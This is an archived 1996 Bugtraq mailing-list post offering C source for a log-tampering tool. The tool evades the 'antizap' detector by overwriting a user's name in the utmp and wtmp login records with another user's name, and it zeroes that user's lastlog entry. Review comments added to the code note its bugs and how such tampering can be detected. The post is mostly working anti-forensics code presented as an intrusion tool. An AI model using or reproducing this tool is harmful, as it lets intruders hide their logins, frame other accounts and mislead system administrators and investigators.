[3422] in bugtraq
no subject (file transmission)
daemon@ATHENA.MIT.EDU (Lone Wolf)
Wed Oct 9 15:19:30 1996
Date: Wed, 9 Oct 1996 23:26:26 +0500
Reply-To: Lone Wolf <danny@protocol.ece.iisc.ernet.in>
From: Lone Wolf <danny@protocol.ece.iisc.ernet.in>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
hi, here is a cure to antizap: instead of chucking in null bytes in w/utmp,
replace it with the name of some other user. i think this should do
to fool the antizap programme.
danny
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <utmp.h>
#include <lastlog.h>
#include <pwd.h>
/* Local stand-in for BSD bzero(): zero-fills y bytes at x via memset().
 * NOTE(review): memset(), the str*() calls and exit() are used in this
 * listing, but neither <string.h> nor <stdlib.h> is among the includes, so
 * those functions are implicitly declared. */
#define bzero(x, y) memset(x, 0, y)
/* Single file descriptor shared by every routine in this listing. */
int f;
/*
 * kill_tmp - rewrite the login-name field of matching records in a
 * utmp-format accounting file.
 *
 *   name  path of the file; opened O_RDWR
 *   who   login name whose records are rewritten
 *   whom  login name written over them
 *
 * K&R definition with an implicit int return type; no value is returned,
 * and a failed open() is skipped silently.
 *
 * Only the name field is modified: each matching record is written back
 * with the rest of the struct exactly as it was read, so the terminal line,
 * timestamp and remaining members still describe the original session.
 * For an investigator this means an altered record keeps its original
 * context and can be checked against independent sources (remote syslog,
 * process accounting, shell/audit logs).
 */
kill_tmp(name,who,whom)
char *name,
*who,
*whom;
{
struct utmp utmp_ent,utmp_new;
/* Pass 1: print ut_line for a record whose name starts with whom. The
 * compare covers only strlen(whom) bytes, so it is a prefix match.
 * close(f) sits inside the loop body: after the first match the next
 * read() runs on a closed descriptor and the loop ends; when nothing
 * matches, the descriptor is never closed before f is reassigned below. */
if ((f=open(name,O_RDWR))>=0) {
while(read (f, &utmp_new, sizeof (utmp_new))> 0 )
if (!strncmp(utmp_new.ut_name,whom,strlen(whom)))
{
printf("ut_line :%s\n",utmp_new.ut_line);
close(f);
}
}
/* Pass 2: for every record whose name starts with who (prefix match again),
 * overwrite the name, step back one record and write it in place.
 * NOTE(review): ut_name is compared but ut_user is written - presumably
 * ut_name is the platform's alias for ut_user; confirm against <utmp.h>. */
if ((f=open(name,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
/* The literal 8 means exactly 8 bytes are touched: NUL padding when whom is
 * shorter, no terminator when it is 8 characters or longer. If the field is
 * wider than 8 bytes on the target platform (not shown here), bytes past
 * the eighth keep the tail of the original name, which a raw dump of the
 * record would reveal. */
strncpy(utmp_ent.ut_user,whom,8);
/* Results of lseek() and write() are not checked. */
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}
/*
 * kill_lastlog - zero the lastlog record of one account.
 *
 *   who  login name, resolved to a uid with getpwnam()
 *
 * Seeks to uid * sizeof(struct lastlog) from the start of the hard-coded
 * file /usr/adm/lastlog and writes one all-zero struct lastlog there.
 * Prints "<who>: ?" when the name is unknown; a failed open() is skipped
 * silently and the lseek()/write() results are not checked.
 *
 * Detection angle: the record is blanked rather than restored, so an
 * account with an all-zero lastlog entry while other logs still show
 * logins for it is an inconsistency worth investigating.
 */
void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;
if ((pwd=getpwnam(who))!=NULL) {
if ((f=open("/usr/adm/lastlog", O_RDWR)) >= 0) {
/* whence 0 is SEEK_SET: the file is indexed by uid, one record per uid. */
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}
} else printf("%s: ?\n",who);
}
/*
 * main - entry point; expects exactly two arguments.
 *
 *   argv[1]  login name to be replaced
 *   argv[2]  login name to put in its place
 *
 * The usage text says "uid", but both arguments are handled as login names
 * (compared against ut_name, passed to getpwnam()). Runs kill_tmp() on the
 * hard-coded paths /etc/utmp and /usr/adm/wtmp, then kill_lastlog() on
 * argv[1]. The closing messages are printed unconditionally: nothing here
 * checks whether any file was opened or any record matched. With any other
 * argument count it prints usage and exits with status 1.
 *
 * All three target files are opened O_RDWR, so write access to them is a
 * precondition; restricting that access and monitoring these files for
 * in-place modification are the controls this listing runs up against.
 */
main(argc,argv)
int argc;
char *argv[];
{
if (argc==3) {
kill_tmp("/etc/utmp",argv[1],argv[2]);
kill_tmp("/usr/adm/wtmp",argv[1],argv[2]);
kill_lastlog(argv[1]);
printf("The Lone Wolf Strikes ......!\n");
printf("%s changed to %s ......!\n",argv[1],argv[2]);
} else
{ printf("Usage: filename uid_to_be_replaced required_uid.\n");
exit(1);
}
}